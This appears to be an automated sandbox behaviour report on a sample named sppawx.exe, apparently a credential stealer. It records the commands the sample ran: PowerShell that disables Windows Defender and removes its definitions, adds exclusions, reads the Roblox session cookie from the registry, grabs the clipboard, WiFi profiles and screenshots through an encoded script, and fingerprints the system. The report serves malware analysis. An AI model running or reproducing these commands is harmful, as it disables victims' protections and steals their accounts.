Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03

Source: C:\Users\user\Desktop\sppawx.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI78082

Jump to behavior

Source: sppawx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\sppawx.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\sppawx.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: sppawx.exe

ReversingLabs: Detection: 36%

Source: sppawx.exe	String found in binary or memory: id-cmc-addExtensions
Source: sppawx.exe	String found in binary or memory: set-addPolicy

Source: C:\Users\user\Desktop\sppawx.exe

File read: C:\Users\user\Desktop\sppawx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\sppawx.exe "C:\Users\user\Desktop\sppawx.exe"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Users\user\Desktop\sppawx.exe "C:\Users\user\Desktop\sppawx.exe"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA7D9.tmp" "c:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
